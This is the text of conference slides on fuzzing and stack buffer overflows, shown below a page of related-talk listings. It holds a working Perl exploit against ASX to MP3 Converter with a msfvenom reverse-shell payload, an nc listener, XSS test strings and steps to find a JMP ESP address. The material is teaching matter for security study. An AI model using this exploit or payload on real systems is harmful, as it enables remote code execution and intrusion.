Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 

Recently uploaded (20)

Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 

Finding 0days at Arab Security Conference

  • 1. Rodolpho Concurde (ROd0X) Information Security Consultant 1 Fuzzing: Finding Your Own Bugs and 0days!
  • 2. $Whoami – Rodolpho Concurde (ROd0X)  Penetration Tester  Instructor I.T  Consultant of I.S – 13 years  EC-C|EH  Talks at Hack in the Box, MorterueloCON, Red Team Village, Stackconf, Bsides Athens & Bsides SATX.  Author Hakin9 Magazine: Stack Overfow, Pentest Magazine: Covert Channel, From Fuzzing to Get a Shell and From SEH Overwrite to Get a Shell.  https://www.linkedin.com/in/rodolphoconcurde  rconcurde@gmail.com 2
  • 3. Agenda Fuzzing:  Types of targets;  Types of attacks;  Types of fuzzers;  Buffer Overfow;  PoC!! 3
  • 4. Types of targets - Protocol: FTP, POP3, SMTP, Telnet, anyone! - Application: Any INPUT of any application. - File format: Any fle Format (.mp3, .m3u, mp4, …) for test the software’s reader! 4
  • 5. Types of Attacks Fuzzers would try combinations of attacks on: - numbers - chars - metadata - pure binary sequences Is sent for the target one list with sequence of dangerous string. Example: (-999999999, alert`1`, top["al"+"ert"](1), <a href="data:text/html;base64_,<svg/onload=u0061&#x6C; &#101%72t(1)>">X</a, 11000001000010010001100). 5
  • 6. Types of Fuzzers - Characteristics  Dumb: any string combination;  Smart fuzzing: Smart fuzzers are programmed with knowledge of the input format, i.e. a protocol defnition or rules for a fle format. - Mutation; -- Through replay and MITM or Proxy - Generation; - Evolutionary. Ref: https://www.f-secure.com/en/consulting/our-thinking/15-minute-guide-to-fuzzing 6
  • 7. Buffer overfow Buffer overfow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations. Might be: Heap based: place in the memory which allocate lot amount of data and, dynamically; Stack based: Allocate a limited or fxed size of data, such as, data from local variables or functions. 7
  • 8. B.0 Code Example int main(int argc, char *argv[]) { // Reserve 5 byte of buffer plus the terminating NULL. // To overflow, need more than 5 bytes... char buffer[5]; // If more than 5 characters input // by user, there will be access // violation, segmentation fault // a prompt how to execute the program... if (argc < 2) { printf("strcpy() NOT executed....n"); printf("Syntax: %s <characters>n", argv[0]); exit(0); } ……………………... 8
  • 9. 9
  • 10. PoC Discovery INPUT format to realize the fuzz. Example of the protocol POP3 - https://tools.ietf.org/rfc/rfc1081.txt 10
  • 11. PoC Vulnerable software to download: https://www.exploit-db.com/apps/02fffa94e55f73bb2e467810fcad09f7- yahoopops-win-0.6.exe 11
  • 13. PoC Vul software to File Format Fuzzing! http://s2.download.net.pl/ASX-to-MP3-Converter-4063-6400-5319.exe Opening in Immunityy Debugger the software in: File -> Attach -> ASX2MP3Converter and Run the same with F9 13
  • 14. PoC Image demonstrated below, show the code used to fuzzing the vulnerable software. Sending to the INPUT of the software the String reached in variable [$buffer]. The value of variable [$buffer] can be generated utilizing the tool of Metasploit pattern_create. 14
  • 15. PoC Compiling the code with the command [perl asx2mp3.pl] After, load the fle p0c.m3u in vul software, run the same in Immunity Debugger. And we have a Stack Overfow! 15
  • 16. PoC The next step is utilize the pattern_offset to localize the Offset of EIP. 16
  • 17. PoC In Debugger, we make use of mona.py for see the modules utilized by the vulnerable software. We need to fnd a address that make a JUMP from EIP to ESP, for in ESP we put our shellcode. Let’s search some module that make JUMP ESP, frst let’s see the modules. For this we will use the mona.py script: https://raw.githubusercontent.com/corelan/mona/master/mona.py You should make download of mona.py and paste at: c:Program FilesImmunity IncImmunity DebuggerPyCommands Let’s use the mona! Type in command bar of Immunity: !mona modules We should fnd a module without mechanisms of protection. 17
  • 18. PoC Next step is fnd inside of msvos module, some expression that make a Jump to the ESP Register; for this, frst we should obtain the assembly value referent the JMP ESP. Now, the mona command to fnd this expression. 18
  • 19. PoC From this command is fnd the address 0x01ba135b, and it we should insert in following exploit code. 19
  • 20. PoC Now we need to search for bad characters, depending on the application, type of vulnerability and protocols in use, may be certain characters which are considered "bad" and should not be used in your buffer or shellcode. One example of bad characters is 0x00. This character is considered bad because a null byte is also used to terminate a string copy operation, which would truncate our buffer whenever which the null byte appears. For test if has more badchars in the software, close the software and the Immunity, and reopen the Immunity and attach the software in the Immunity again. 20
  • 21. PoC We will send the string bellow inside of our exploit code. "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10" "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20" "x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30" "x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40" "x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50" "x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60" "x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70" "x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80" "x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90" "x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0" "xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0" "xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0" "xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0" "xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0" "xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0" "xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff". 21
  • 23. PoC In Immunity, give a click with right-button in ESP and click in Follow in Dump. 23
  • 24. PoC Dump of memory with badchars. 24
  • 25. PoC The character 0x00 and 0x0a we won’t send, because we already know that it is a badchars and, for this, generate error in the software. Our exploit code is like image below! We add variable badchars. 25
  • 26. PoC Dump of memory without badchar x0a. 26
  • 27. PoC Setted a Breakpoint in EIP address with a double-click we see the fow of execution stop in the address chosen. For last, let’s generate our shellcode with the msfvenom tool and introduce it in exploit code. 27
  • 29. PoC Load the new malicious fle inside ASX2MP3. 29
  • 30. PoC nc –lvvp 5555 - > to listen in a TCP port 5555 And we got a shell :) 30
  • 31. Exploit Code #!/usr/bin/perl my $buffsize = 50000; my $junk = "x41" x 35056; my $eip = "x5bx13xbax01"; my $nops = "x90" x 10; # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.43.114 LPORT=5555 -f perl -e x86/shikata_ga_nai -b "x0ax00" my $shell = "xdaxc2xf2xe7x42xdaxccxd9x74x24xf4x58x33xc9" . "xb1x52x31x70x12x83xc0x04x03xb2xfcx05xb7xce" . …. Shelllcode …. . "x38xa2x9exb7x3dxeex18x24x4cx7fxcdx4axe3x80" . "xba"; my $sploit = $junk.$eip.$nops.$shell; my $fll = "x43" x ($buffsize - (length($sploit))); my $buffer = $sploit.$fll; # write the exploit buffer to fle my $fle = "p0c.m3u"; open (FILE, ">$fle"); print FILE $buffer; close(FILE); print "Exploit fle created [" . $fle . "]n"; print "Buffer size: ". length($buffer) . "n"; 31